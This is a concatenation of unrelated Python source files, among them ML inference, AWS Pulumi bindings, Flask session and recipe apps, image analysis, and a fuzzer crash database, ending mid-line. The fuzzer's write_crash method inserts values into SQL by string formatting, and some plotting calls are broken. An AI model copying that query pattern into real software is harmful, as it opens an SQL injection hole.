with tf.Session(config=config) as sess: step = restore_ckpt(sess, args.ckpt_dir) # for node in sess.graph.as_graph_def().node: # print(node.name) # https://stackoverflow.com/questions/46912721/tensorflow-restore-model-with-sparse-placeholder labels_placeholder = tf.SparseTensor( values=sess.graph.get_tensor_by_name('labels/values:0'), indices=sess.graph.get_tensor_by_name('labels/indices:0'), dense_shape=sess.graph.get_tensor_by_name('labels/shape:0') ) feeds = { 'inputs': sess.graph.get_tensor_by_name('inputs:0'), 'is_training': sess.graph.get_tensor_by_name('is_training:0'), 'sequence_length': sess.graph.get_tensor_by_name('sequence_length:0'), 'labels': labels_placeholder } fetches = [ sess.graph.get_tensor_by_name('output:0'), # dense_decoded sess.graph.get_tensor_by_name('Mean_1:0'), # mean edit distance sess.graph.get_tensor_by_name('edit_distance:0') # batch edit distances ] ds_dirs = [] if args.load_sub_infer_dir: sub_names = utils.list_valid_sub_name(args.infer_dir) for sub_name in sub_names: sub_name_with_path = os.path.join(args.infer_dir, sub_name) if utils.is_dir(sub_name_with_path): ds_dirs.append(sub_name_with_path) else: ds_dirs.append(args.infer_dir) for ds_dir in ds_dirs: ds = ImgDataset(ds_dir, converter, args.infer_batch_size, shuffle=False, data_ordered=args.infer_data_ordered) validation(sess, feeds, fetches, ds, converter, args.result_dir, name='infer', print_batch_info=True, copy_failed=args.infer_copy_failed, step=step) def main(): args = parse_infer_args(infer=True) if args.gpu: dev = '/gpu:0' else: dev = '/cpu:0' with tf.device(dev): infer(args) if __name__ == '__main__': main() pulumi/pulumi-aws-native # coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'GetSubnetNetworkAclAssociationResult', 'AwaitableGetSubnetNetworkAclAssociationResult', 'get_subnet_network_acl_association', 'get_subnet_network_acl_association_output', ] @pulumi.output_type class GetSubnetNetworkAclAssociationResult: def __init__(__self__, association_id=None): if association_id and not isinstance(association_id, str): raise TypeError("Expected argument 'association_id' to be a str") pulumi.set(__self__, "association_id", association_id) @property @pulumi.getter(name="associationId") def association_id(self) -> Optional[str]: return pulumi.get(self, "association_id") class AwaitableGetSubnetNetworkAclAssociationResult(GetSubnetNetworkAclAssociationResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetSubnetNetworkAclAssociationResult( association_id=self.association_id) def get_subnet_network_acl_association(association_id: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubnetNetworkAclAssociationResult: """ Resource Type definition for AWS::EC2::SubnetNetworkAclAssociation """ __args__ = dict() __args__['associationId'] = association_id if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('aws-native:ec2:getSubnetNetworkAclAssociation', __args__, opts=opts, typ=GetSubnetNetworkAclAssociationResult).value return AwaitableGetSubnetNetworkAclAssociationResult( association_id=__ret__.association_id) @_utilities.lift_output_func(get_subnet_network_acl_association) def get_subnet_network_acl_association_output(association_id: Optional[pulumi.Input[str]] = None, opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSubnetNetworkAclAssociationResult]: """ Resource Type definition for AWS::EC2::SubnetNetworkAclAssociation """ ... beardnecks/aws-github-integration0 """Creates a list of the public IPs for Bitbucket and Github Fetches an updated list of Bitbucket and Github public server IPs to be used for authenticating webhooks in the GitPull lambda function """ import os import boto3 import requests def lambda_handler(event: dict, context): """Creates a list of the public IPs for Bitbucket and Github After creating a comma separated list the function uploads the file to an S3 bucket for use by the GitPull lambda :param event: Lambda event information from AWS - Not used :param context: Lambda context information from AWS - Not used :return: """ ip_bucket = os.environ["IPBucket"] # Bitbucket IPs resp = requests.get("https://ip-ranges.atlassian.com") bitbucket_resp = resp.json() valid_ips = "" for item in bitbucket_resp["items"]: valid_ips += item["cidr"] + "," # Github IPs resp = requests.get("https://api.github.com/meta") github_resp = resp.json() for ip in github_resp["web"]: valid_ips += ip + "," for ip in github_resp["api"]: valid_ips += ip + "," for ip in github_resp["git"]: valid_ips += ip + "," f = open("/tmp/ips", "wb") f.write(valid_ips.rstrip(",").encode()) # Strip to remove trailing comma f.close() s3 = boto3.client("s3") s3.upload_file("/tmp/ips", ip_bucket, "ips") print("Updated valid ips") """ Copyright (c) 2020, VRAI Labs and/or its affiliates. All rights reserved. This software is licensed under the Apache License, Version 2.0 (the "License") as published by the Apache Software Foundation. You may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from supertokens_flask.constants import ( HOSTS_CONFIG, API_CONFIG, ACCESS_TOKEN_PATH_CONFIG, REFRESH_TOKEN_PATH_CONFIG, COOKIE_DOMAIN_CONFIG, COOKIE_SECURE_CONFIG, COOKIE_SAME_SITE_CONFIG ) from supertokens_flask.exceptions import ( raise_try_refresh_token_exception, raise_unauthorised_exception, SuperTokensTokenTheftError, SuperTokensUnauthorisedError, SuperTokensTryRefreshTokenError, ) from supertokens_flask.session import Session from flask import request, make_response from supertokens_flask import session_helper from supertokens_flask.cookie_and_header import ( CookieConfig, clear_cookies, get_anti_csrf_header, attach_anti_csrf_header, set_options_api_headers, get_access_token_from_cookie, attach_access_token_to_cookie, get_refresh_token_from_cookie, attach_refresh_token_to_cookie, save_frontend_info_from_request, get_id_refresh_token_from_cookie, attach_id_refresh_token_to_cookie_and_header, get_cors_allowed_headers as get_cors_allowed_headers_from_cookie_and_headers ) from supertokens_flask.default_callbacks import ( default_unauthorised_callback, default_try_refresh_token_callback, default_token_theft_detected_callback ) def create_new_session(response, user_id, jwt_payload=None, session_data=None): session = session_helper.create_new_session( user_id, jwt_payload, session_data) access_token = session['accessToken'] refresh_token = session['refreshToken'] id_refresh_token = session['idRefreshToken'] attach_access_token_to_cookie( response, access_token['token'], access_token['expiry'], access_token['domain'] if 'domain' in access_token else None, access_token['cookiePath'], access_token['cookieSecure'], access_token['sameSite'] ) attach_refresh_token_to_cookie( response, refresh_token['token'], refresh_token['expiry'], refresh_token['domain'] if 'domain' in refresh_token else None, refresh_token['cookiePath'], refresh_token['cookieSecure'], refresh_token['sameSite'] ) attach_id_refresh_token_to_cookie_and_header( response, id_refresh_token['token'], id_refresh_token['expiry'], id_refresh_token['domain'] if 'domain' in id_refresh_token else None, id_refresh_token['cookiePath'], id_refresh_token['cookieSecure'], id_refresh_token['sameSite'] ) if 'antiCsrfToken' in session and session['antiCsrfToken'] is not None: attach_anti_csrf_header(response, session['antiCsrfToken']) return Session(access_token['token'], session['session']['handle'], session['session']['userId'], session['session']['userDataInJWT'], response) def get_session(response, enable_csrf_protection): save_frontend_info_from_request(request) id_refresh_token = get_id_refresh_token_from_cookie(request) if id_refresh_token is None: clear_cookies(response) raise_unauthorised_exception('id refresh token is missing in cookies') access_token = get_access_token_from_cookie(request) if access_token is None: raise_try_refresh_token_exception('access token missing in cookies') try: anti_csrf_token = get_anti_csrf_header(request) new_session = session_helper.get_session(access_token, anti_csrf_token, enable_csrf_protection) if 'accessToken' in new_session: access_token = new_session['accessToken']['token'] session = Session(access_token, new_session['session']['handle'], new_session['session']['userId'], new_session['session']['userDataInJWT'], response) if 'accessToken' in new_session: if response is not None: access_token_info = new_session['accessToken'] attach_access_token_to_cookie( response, access_token_info['token'], access_token_info['expiry'], access_token_info['domain'] if 'domain' in access_token_info else None, access_token_info['cookiePath'], access_token_info['cookieSecure'], access_token_info['sameSite'] ) else: session.new_access_token_info = new_session['accessToken'] return session except SuperTokensUnauthorisedError as e: clear_cookies(response) raise e def refresh_session(response): save_frontend_info_from_request(request) refresh_token = get_refresh_token_from_cookie(request) if refresh_token is None: clear_cookies(response) raise_unauthorised_exception('Missing auth tokens in cookies. Have you set the correct refresh API path in ' 'your frontend and SuperTokens config?') try: anti_csrf_token = get_anti_csrf_header(request) new_session = session_helper.refresh_session(refresh_token, anti_csrf_token) access_token = new_session['accessToken'] refresh_token = new_session['refreshToken'] id_refresh_token = new_session['idRefreshToken'] session = Session(access_token['token'], new_session['session']['handle'], new_session['session']['userId'], new_session['session']['userDataInJWT'], response) if response is not None: attach_access_token_to_cookie( response, access_token['token'], access_token['expiry'], access_token['domain'] if 'domain' in access_token else None, access_token['cookiePath'], access_token['cookieSecure'], access_token['sameSite'] ) attach_refresh_token_to_cookie( response, refresh_token['token'], refresh_token['expiry'], refresh_token['domain'] if 'domain' in refresh_token else None, refresh_token['cookiePath'], refresh_token['cookieSecure'], refresh_token['sameSite'] ) attach_id_refresh_token_to_cookie_and_header( response, id_refresh_token['token'], id_refresh_token['expiry'], id_refresh_token['domain'] if 'domain' in id_refresh_token else None, id_refresh_token['cookiePath'], id_refresh_token['cookieSecure'], id_refresh_token['sameSite'] ) if 'antiCsrfToken' in new_session and new_session['antiCsrfToken'] is not None: attach_anti_csrf_header(response, new_session['antiCsrfToken']) else: session.new_access_token_info = access_token session.new_refresh_token_info = refresh_token session.new_id_refresh_token_info = id_refresh_token if 'antiCsrfToken' in new_session and new_session['antiCsrfToken'] is not None: session.new_anti_csrf_token = new_session['antiCsrfToken'] return session except (SuperTokensTokenTheftError, SuperTokensUnauthorisedError) as e: clear_cookies(response) raise e def revoke_session(session_handle): return session_helper.revoke_session(session_handle) def revoke_all_sessions_for_user(user_id): return session_helper.revoke_all_sessions_for_user(user_id) def get_all_session_handles_for_user(user_id): return session_helper.get_all_session_handles_for_user(user_id) def revoke_multiple_sessions(session_handles): return session_helper.revoke_multiple_sessions(session_handles) def get_session_data(session_handle): return session_helper.get_session_data(session_handle) def update_session_data(session_handle, new_session_data): session_helper.update_session_data(session_handle, new_session_data) def get_jwt_payload(session_handle): return session_helper.get_jwt_payload(session_handle) def update_jwt_payload(session_handle, new_jwt_payload): session_helper.update_jwt_payload(session_handle, new_jwt_payload) def set_relevant_headers_for_options_api(response): set_options_api_headers(response) def get_cors_allowed_headers(): return get_cors_allowed_headers_from_cookie_and_headers() class SuperTokens: def __init__(self, app): self.__unauthorised_callback = default_unauthorised_callback self.__try_refresh_token_callback = default_try_refresh_token_callback self.__token_theft_detected_callback = default_token_theft_detected_callback hosts = app.config.setdefault(HOSTS_CONFIG, None) api_key = app.config.setdefault(API_CONFIG, None) access_token_path = app.config.setdefault(ACCESS_TOKEN_PATH_CONFIG, None) refresh_token_path = app.config.setdefault(REFRESH_TOKEN_PATH_CONFIG, None) cookie_domain = app.config.setdefault(COOKIE_DOMAIN_CONFIG, None) cookie_secure = app.config.setdefault(COOKIE_SECURE_CONFIG, None) cookie_same_site = app.config.setdefault(COOKIE_SAME_SITE_CONFIG, None) session_helper.init(hosts, api_key) CookieConfig.init(access_token_path, refresh_token_path, cookie_domain, cookie_secure, cookie_same_site) self.__set_error_handler_callbacks(app) def __set_error_handler_callbacks(self, app): @app.errorhandler(SuperTokensUnauthorisedError) def handle_unauthorised(e): response = make_response(self.__unauthorised_callback(e)) clear_cookies(response) return response @app.errorhandler(SuperTokensTryRefreshTokenError) def handle_try_refresh_token(e): response = make_response(self.__try_refresh_token_callback(e)) return response @app.errorhandler(SuperTokensTokenTheftError) def handle_token_theft(e): response = make_response( self.__token_theft_detected_callback( e.session_handle, e.user_id)) clear_cookies(response) return response def set_unauthorised_error_handler(self, callback): self.__unauthorised_callback = callback def set_try_refresh_token_error_handler(self, callback): self.__try_refresh_token_callback = callback def set_token_theft_detected_error_handler(self, callback): self.__token_theft_detected_callback = callback PRIORITY_CHOICE = ( ('low','LOW'), ('medium','Medium'), ('high','High'), ) RESOLVE_CHOICE = ( ('open','Open'), ('in_progress','In-progress'), ('review','Review'), ('cancelled','Cancelled'), ('done','Done'), ) USER_TYPE_CHOICE = ( ('admin','Admin'), ('employee','Employee'), ('student','Student'), ('admission_officer','Admission Officer'), ('register_offier','Register Offier'), )Borsos/rubikrubik/cubes/utilities.py #!/usr/bin/env python3 # # Copyright 2014 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # __author__ = "" __all__ = [ 'precise_sum', 'precise_mean', 'interpolate_filename', ] import numpy as np import random from .dtypes import best_precise_dtype, get_dtype from ..shape import Shape def precise_sum(cube, axis=None, dtype=None, out=None, keepdims=False): """precise_sum(cube, axis=None, dtype=None, out=None, keepdims=False) -> precise sum of cube This is a replacement of numpy.sum; if dtype is None, the best precise dtype is used. """ if dtype is None: dtype = best_precise_dtype(cube.dtype) return np.sum(a=cube, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def precise_mean(cube, axis=None, dtype=None, out=None, keepdims=False): """precise_mean(cube, axis=None, dtype=None, out=None, keepdims=False) -> precise mean of cube This is a replacement of numpy.mean; if dtype is None, the best precise dtype is used. """ if dtype is None: dtype = best_precise_dtype(cube.dtype) return np.mean(a=cube, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def interpolate_filename(filename, shape, dtype, file_format, keywords=None): if file_format is None: file_format = DEFAULT_FILE_FORMAT dtype = get_dtype(dtype) if keywords is None: keywords = {} count = 0 if shape: count = 1 for i in shape: count *= i else: count = 0 if not isinstance(shape, Shape): shape = Shape(shape) return filename.format( shape=shape, rank=len(shape), count=count, format=file_format, dtype=dtype.__name__, **keywords ) # # BrundleFuzz server side database operations # SQLite is beautiful # import sqlite3 as sqlite import sys class CrashDataBase(object): """ Some convenience wrappers for the SQLite database operations """ def __init__(self, parent): """ Simplicity is better than complexity """ self.parent = parent self.ae = parent.ae self.cfg = parent.cfg try: self.con = sqlite.connect('fuzz.db') self.cur = self.con.cursor() self.cur.executescript(""" CREATE TABLE IF NOT EXISTS Crashes ( \ Id INTEGER PRIMARY KEY, \ NodeId TEXT, \ Machine TEXT, \ Cpu TEXT, \ Victim TEXT, \ EventName TEXT, \ Ip TEXT, \ Exploitable TEXT, \ FileName TEXT); """) self.con.commit() self.ae.m_ok('Database initialized successfully :)') except sqlite.Error, e: if self.con: self.con.rollback() self.ae.m_fatal("Error: %s" % e.args[0]) sys.exit(1) def write_crash(self, crash_properties): """ Process data to a format suitable for storage in the SQLite database """ node_id = crash_properties['node_id'] machine = crash_properties['machine'] cpu = crash_properties['cpu'] victim_pathname = crash_properties['victim'] event_name = crash_properties['event_name'] ip = crash_properties['ip'] exp = crash_properties['exploitability'] filename = crash_properties['filename'] victim_filename = victim_pathname.split('\\')[-1] self.cur.execute("INSERT INTO Crashes(NodeId, Machine, Cpu, Victim, EventName, Ip, Exploitable, FileName) \ VALUES('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');" % (node_id, machine, cpu, victim_filename, event_name, ip, exp, filename)) self.con.commit() def retrieve_crashes(self): """ Gets all crash information :return: iterator of tuples """ self.cur.execute("SELECT * FROM Crashes") rows = self.cur.fetchall() return rows ChunjunHu/SemanticSegmentationofCropRemoteSensingBasedonDeepLearning1-10 ''' Author : now more Connect : LastEditors : now more Description : build_transforms LastEditTime: 2019-07-06 20:07:26 ''' from .build import * exercises/w.py def next(p): f = False if p == 2: p = 1 while not f: p += 2 f = True for i in range(2, p): if p%i == 0: f = False return p def primeFactorization(num): p = 2 r = list() while num != 0: d, m = divmod(num, p) print(d, m, p) if m == 0: num = d r.append(p) elif d == 0: num = 0 else: p = next(p) return r def lcm(nums): l = 1 ns = nums[:] d = False while not d: m = min(ns) l *= m ns.remove(m) d = True for x in nums: print(x, l%x) if l % x != 0: d = False break return l examples/kristen_support.py import csv import logging as logger import os from _csv import writer as csv_writer from collections import defaultdict import numpy as np from matplotlib import pyplot as plt from scipy import ndimage as ndi, stats import imagepipe.raw_functions import imagepipe.tools.helpers import imagepipe.wrapped_functions import imagepipe.core_functions from imagepipe import core_functions as cf, density_plot from imagepipe.core_functions import generator_wrapper @generator_wrapper(in_dims=2,out_dims=(None,)) def Kristen_render_single_image(dapi, gfp, mcherry): plt.figure(figsize=(26.0, 15.0)) plt.title('Max Projection') plt.subplot(221) plt.title('DAPI') plt.imshow(dapi,interpolation='nearest') plt.subplot(222) plt.title('GFP') plt.imshow(gfp, interpolation='nearest') plt.subplot(221) plt.title('mCherry') plt.imshow(mcherry, interpolation='nearest') @generator_wrapper(in_dims=(None,None, 2, 2, 3, 3), out_dims=(None,)) def Kristen_render(name_pattern, group_id, mCherry, extranuclear_mCherry_pad, GFP_orig, mCherry_orig, output, save=False, directory_to_save_to='verification'): labels, _ = ndi.label(extranuclear_mCherry_pad) unique_segmented_cells_labels = np.unique(labels)[1:] mCherry_cutoff = np.zeros_like(mCherry) qualifying_cell_label = [] qualifying_regression_stats = [] for cell_label in unique_segmented_cells_labels: mCherry_2 = np.zeros_like(mCherry) my_mask = labels == cell_label average_apply_mask = np.mean(mCherry[my_mask]) intensity = np.sum(mCherry[my_mask]) binary_pad = np.zeros_like(mCherry) binary_pad[my_mask] = 1 pixel = np.sum(binary_pad[my_mask]) if (average_apply_mask > .05 or intensity > 300) and pixel > 4000: GFP_limited_to_cell_mask = imagepipe.raw_functions.f_3d_stack_2d_filter(GFP_orig, my_mask) mCherry_limited_to_cell_mask = imagepipe.raw_functions.f_3d_stack_2d_filter(mCherry_orig, my_mask) qualifying_3d_GFP = GFP_limited_to_cell_mask[mCherry_limited_to_cell_mask>50] average_3d_GFP = np.mean(qualifying_3d_GFP) median_3d_GFP = np.median(qualifying_3d_GFP) std_3d_GFP = np.std(qualifying_3d_GFP) sum_qualifying_GFP = np.sum(qualifying_3d_GFP) nonqualifying_3d_GFP = GFP_limited_to_cell_mask[mCherry_limited_to_cell_mask<=50] average_nonqualifying_3d_GFP = np.mean(nonqualifying_3d_GFP) median_nonqualifying_3d_GFP = np.median(nonqualifying_3d_GFP) std_nonqualifying_3d_GFP = np.std(nonqualifying_3d_GFP) sum_nonqualifying_GFP = np.sum(nonqualifying_3d_GFP) sum_total_GFP = sum_qualifying_GFP + sum_nonqualifying_GFP percent_qualifying_over_total_GFP = sum_qualifying_GFP/sum_total_GFP # report the percentage too or sums are sufficient? GFP_orig_qualifying = imagepipe.raw_functions.f_3d_stack_2d_filter(GFP_orig, my_mask) mCherry_orig_qualifying = imagepipe.raw_functions.f_3d_stack_2d_filter(mCherry_orig, my_mask) mCherry_1d = mCherry_orig_qualifying[mCherry_orig_qualifying > 50] GFP_1d = GFP_orig_qualifying[mCherry_orig_qualifying>50] regression_results = stats.linregress(GFP_1d, mCherry_1d) mCherry_2[my_mask] = mCherry[my_mask] mCherry_cutoff[my_mask] = mCherry[my_mask] qualifying_cell_label.append(cell_label) qualifying_regression_stats.append((regression_results[0], regression_results[2], regression_results[3])) name_pattern_split = name_pattern.split(' - ') transfection_label = name_pattern_split[0] cell_type = name_pattern_split[1] exp_time = name_pattern_split[2] image_number = name_pattern_split[4] with open(output, 'ab') as output_file: writer = csv_writer(output_file, delimiter='\t') writer.writerow([transfection_label, cell_type, exp_time, image_number, cell_label, sum_qualifying_GFP, sum_total_GFP, average_3d_GFP, median_3d_GFP, std_3d_GFP, average_nonqualifying_3d_GFP, median_nonqualifying_3d_GFP, std_nonqualifying_3d_GFP, regression_results[0], regression_results[2], regression_results[3]]) plt.figure(figsize=(26.0, 15.0)) plt.title('Kristen\'s Data') plt.suptitle(name_pattern) main_ax = plt.subplot(221) plt.subplot(221, sharex=main_ax, sharey=main_ax) plt.title('mCherry Binary') im = plt.imshow(extranuclear_mCherry_pad, interpolation='nearest', cmap = 'hot') plt.colorbar(im) plt.subplot(222, sharex=main_ax, sharey=main_ax) plt.title('mCherry') plt.imshow(mCherry, interpolation='nearest') plt.contour(extranuclear_mCherry_pad, [0.5], colors='k') plt.subplot(223) plt.better2D_desisty_plot(GFP_1d, mCherry_1d) plt.title('mCherry Intensity as a Function of GFP Voxel') plt.xlabel('GFP Voxel') plt.ylabel('mCherry Intensity') plt.subplot(224, sharex=main_ax, sharey=main_ax) plt.title('mCherry-cutoff applied') plt.imshow(mCherry_2, interpolation='nearest') if not save: plt.show() else: name_puck = directory_to_save_to + '/' + 'Kristen-' + name_pattern+ '_cell' + str(cell_label)+ '.png' plt.savefig(name_puck) plt.close() plt.figure(figsize=(26.0, 15.0)) main_ax = plt.subplot(121) plt.subplot(121, sharex=main_ax, sharey=main_ax) plt.suptitle('mCherry Before and After Qualifying Cell Cutoff is Applied') plt.title('mCherry') im = plt.imshow(mCherry, interpolation='nearest') plt.colorbar(im) plt.subplot(122, sharex=main_ax, sharey=main_ax) plt.title('mCherry') plt.imshow(mCherry_cutoff, interpolation='nearest') if not save: plt.show() else: name_puck = directory_to_save_to + '/' + 'Kristen-' + name_pattern + 'cutoff_app' + '.png' plt.savefig(name_puck) plt.close() return qualifying_regression_stats @generator_wrapper(in_dims=(None, 0, 0, 0, 0, 0, 0, 0, 0, 0 ), out_dims=(None,)) def Kristen_summarize_a(name_pattern, q_mean,q_median, q_std, nq_mean, nq_median, nq_std, slope, r2, p, output): with open(output, 'ab') as output_file: # csv_read = csv.res writer = csv_writer(output_file, delimiter = '\t') for i in name_pattern: writer.writerow([i, q_mean, q_median, q_std, nq_mean, nq_median, nq_std, slope, r2, p]) def Kristen_traverse(main_root, matching_rule='c', matching_map=None): print "starting kristen's traversal" matched_images = defaultdict(lambda: [''] * len(matching_map)) # name_pattern_list = [] if matching_rule: assert (matching_map is not None) for current_location, sub_directories, files in os.walk(main_root): if files: for img in files: if ('.TIF' in img or '.tif' in img) and '_thumb_' not in img: prefix = imagepipe.raw_functions.split_and_trim(current_location, main_root) img_codename = [img.split('.')[0]] # # choosing one image to work with # c = img_codename[0].split('-')[0] # b = img_codename[0].split(' ')[-1][0] # print c # print b # if c == 'C1' and b[0] == 'B': # # change these conditions back to original to test all images # print "found image" # # name_pattern = ' - '.join(prefix + img_codename[0].split(' ')[1:]) # group_by = img_codename[0][:2] # color = matching_map[img_codename[0].split('-')[0]] # # print matched_images[name_pattern][color] # # print os.path.join(current_location, img) # matched_images[name_pattern][color] = os.path.join(current_location, img) name_pattern = ' - '.join(prefix + img_codename[0].split(' ')[1:]) group_by = img_codename[0][:2] color = matching_map[img_codename[0].split('-')[0]] # print matched_images[name_pattern][color] # print os.path.join(current_location, img) matched_images[name_pattern][color] = os.path.join(current_location, img) # shift tab upper portion out/ placed inside for loop to study a single image but originally only inside the if(.TIF...) delset = [] for name_pattern, (color_set) in matched_images.iteritems(): # debugger.logger.debug(color_set) if any([color == '' for color in color_set]): logger.info('in %s, colorset is broken:', name_pattern) for color_name in color_set: logger.info('\t %s', color_name) logger.info('name_pattern will be deleted') delset.append(name_pattern) for name_pattern in delset: del matched_images[name_pattern] user_input_about_new_csv_file = raw_input("To continue, enter 2. To start the process from the beginning, enter 1") if user_input_about_new_csv_file == '1': print "Preparing a new CSV file" initial_open = open("matched_images.csv", 'wb') # this is the file we need to save unless user provides input saying we can override it writer = csv.writer(initial_open, delimiter='\t') for key in matched_images: writer.writerow([key] + matched_images[key] + [0]) initial_open.close() else: print "Continuing where the process last left off" file_exists = os.path.isfile("matched_images.tmp") if file_exists: open_tmp = open('matched_images.tmp', 'r') read_preexisting_tmp = csv.reader(open_tmp, delimiter='\t') tmp_list = [] for row in read_preexisting_tmp: tmp_list.append(row) open_tmp.close() open_csv = open('matched_images.csv', 'r') read_preexisting_csv = csv.reader(open_csv, delimiter='\t') csv_list = [] for row in read_preexisting_csv: csv_list.append(row) open_csv.close() for csv_row in csv_list: for tmp_row in tmp_list: if csv_row[0] == tmp_row[0]: csv_row[3] = tmp_row[3] open_csv_write = open('matched_images.csv', 'wb') override_csv = csv.writer(open_csv_write, delimiter='\t') for new_csv_row in csv_list: override_csv.writerow(new_csv_row) open_updated_csv_to_read = open('matched_images.csv', 'rb') csv_reader = csv.reader(open_updated_csv_to_read, delimiter='\t') open_tmp_to_write = open("matched_images.tmp", 'wb') writer_check_tmp = csv.writer(open_tmp_to_write, delimiter='\t') for row in csv_reader: name_pattern = row[0] color_set = [row[1], row[2], row[3]] if row[3] == 1: writer_check_tmp.writerow(row) continue channels = [] plot_list = [] for color in color_set: channels.append(imagepipe.tools.helpers.tiff_stack_2_np_arr(color)) plot_list.append(imagepipe.tools.helpers.tiff_stack_2_np_arr(color)) # plt.figure(figsize=(20.0, 15.0)) # plt.suptitle('Projected DAPI. GFP, mCherry') # plt.title('DAPI') # dapi = np.max(plot_list[0], axis=0) # plt.imshow(dapi, interpolation='nearest', cmap='gray') # plt.title('GFP') # gfp = np.max(plot_list[1], axis=0) # plt.imshow(gfp, interpolation='nearest', cmap='gray') # mcherry = np.max(plot_list[2], axis=0) # plt.imshow(mcherry, interpolation='nearest', alpha=0.3) # plt.show() yield name_pattern, matched_images, channels row[3] = 1 writer_check_tmp.writerow(row)#! /usr/bin/python2 # -*- coding: utf8 -*- import pykka import time from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.pipeline import Pipeline from sklearn.cluster import SpectralClustering, AffinityPropagation from datetime import datetime class Learner(pykka.ThreadingActor): """Fetch friends and tweets for a given ego """ def __init__(self, k=20): super(Learner, self).__init__() self.token_processer = Pipeline([('vect', CountVectorizer()), \ ('tfidf', TfidfTransformer()) ]) self.k = k # number of clusters self.clf = SpectralClustering(n_clusters=k, random_state=42, \ affinity='rbf', n_neighbors=15, eigen_tol=0.0) def learn(self, data): # u_ids = [] u_screen_names = [] X = [] def insert(elem): # u_ids.append(elem['u_id']) u_screen_names.append(elem['u_screen_name']) X.append(elem['u_document']) [insert(elem) for elem in data] # Create bag of words representation X = self.token_processer.fit_transform(X) labels = self.clf.fit_predict(X) clustering = [[] for i in range(self.k)] ## Fast loop: # [ clustering[labels[i]].append(u_id) for i, u_id in enumerate(u_ids) ] [ clustering[labels[i]].append(u_scr_n) for i, u_scr_n in enumerate(u_screen_names) ] return {'ego_id':data[0]['ego_id'], "nb_clusters":self.k, 'clustering':clustering, "created_at":str(datetime.now())}Mascarpone/Re71-10 # -*- coding: utf-8 -*- from project import app, gallery from flask import request, render_template, redirect, url_for, abort, flash, jsonify from project.model.default import model from project.model.forms import RecipeForm, CommentForm, ContainForm, SearchForm from wtforms import FormField, TextAreaField, FieldList, validators from flask.ext.login import current_user, login_required from werkzeug import secure_filename from flask.ext.uploads import UploadNotAllowed import math @app.route('/recipes', methods=('GET', 'POST')) @app.route('/recipes/', methods=('GET', 'POST')) def recipes(category=None): max = model.getMaxBudget() max = int(math.ceil(max['MAX(budget)'])) min = model.getMinBudget() min = int(math.floor(min['MIN(budget)'])) form = SearchForm(csrf_enabled=False) if category is not None: form.categories.data = [category] recipes = model.getRecipesSearch(form.data['minprice'], form.data['maxprice'], form.data['ingredients'], form.data['categories'], form.data['query']) images = {} averages = {} for recipe in recipes: image = gallery.url(recipe['image']) if not recipe['image']: image += 'recipe.png' images[recipe['recipeID']] = image averages[recipe['recipeID']] = model.getAverageByRecipeID(recipe['recipeID']) return render_template('recipes.html', form=form, recipes=recipes, images=images, averages=averages, max=max, min=min) @app.route('/recipes/recipe/', methods=('GET', 'POST')) def recipe(id): recipe = model.getRecipe(id) if recipe is not None: form = CommentForm() if form.validate_on_submit(): if current_user.is_authenticated: comment = model.getCommentsByRecipeIDAndUserID(id, current_user.get_id()) if comment is None: model.insertComment(form.comment.data, form.tasteScore.data, form.priceScore.data, form.instructionScore.data, current_user.get_id(), id) else: flash(u"Vous avez déjà commenté cette recette") return redirect(url_for('recipe', id=id)) else : flash(u"Connectez-vous pour pouvoir commenter les recettes") return redirect(url_for('login')) steps = model.getStepsByRecipeID(id) image = gallery.url(recipe['image']) ingredients = model.getContainsByRecipeID(id) comments = model.getCommentsByRecipeID(id) averages = model.getAverageByRecipeID(id) if not recipe['image']: image += 'recipe.png' return render_template('recipe.html', recipe=recipe, steps=steps, image=image, ingredients=ingredients, form=form, comments=comments, averages=averages) return abort(404) @app.route('/recipes/create', methods=('GET', 'POST')) @login_required def createRecipe(): form = RecipeForm(csrf_enabled=False) ingredients = [i['ingredientName'] for i in model.getIngredients()] if form.validate_on_submit(): if form.image.data.filename: try: filename = gallery.save(form.image.data) except UploadNotAllowed: flash(u"Le format d'image n'est pas autorisé.") else: filename = '' recipeID = model.insertRecipe(form.recipeName.data, filename, form.budget.data, form.difficulty.data, form.preparationTime.data, form.cookingTime.data, current_user.get_id(), form.categoryID.data) for contain in form.contains.data: ingredient = model.getIngredientByName(contain['ingredientName']) if ingredient is not None: ingredientID = ingredient['ingredientID'] else: ingredientID = model.insertIngredient(contain['ingredientName']) model.insertContain(recipeID, ingredientID, contain['quantity'], contain['isMain'], contain['unitID'] ) for i, step in enumerate(form.steps.data): model.insertStep(i+1, step, recipeID) return redirect(url_for('recipe', id=recipeID)) return render_template('createRecipe.html', form=form, ingredients=ingredients) @app.route('/recipes/edit/', methods=('GET', 'POST')) @login_required def editRecipe(id): recipe = model.getRecipe(id) if recipe is not None: if recipe['userID'] == int(current_user.get_id()): ingredients = [i['ingredientName'] for i in model.getIngredients()] form = RecipeForm(csrf_enabled=False) choices = { c[0] : c[1] for c in form.contains.entries[0].form.unitID.choices} #assert False if form.validate_on_submit(): model.updateRecipe(id, form.recipeName.data, form.budget.data, form.difficulty.data, form.preparationTime.data, form.cookingTime.data, form.categoryID.data) for i, step in enumerate(form.steps.data): model.updateStep(i+1, step, id) for contain in form.contains.data: ingredient = model.getIngredientByName(contain['ingredientName']) ingredientID = 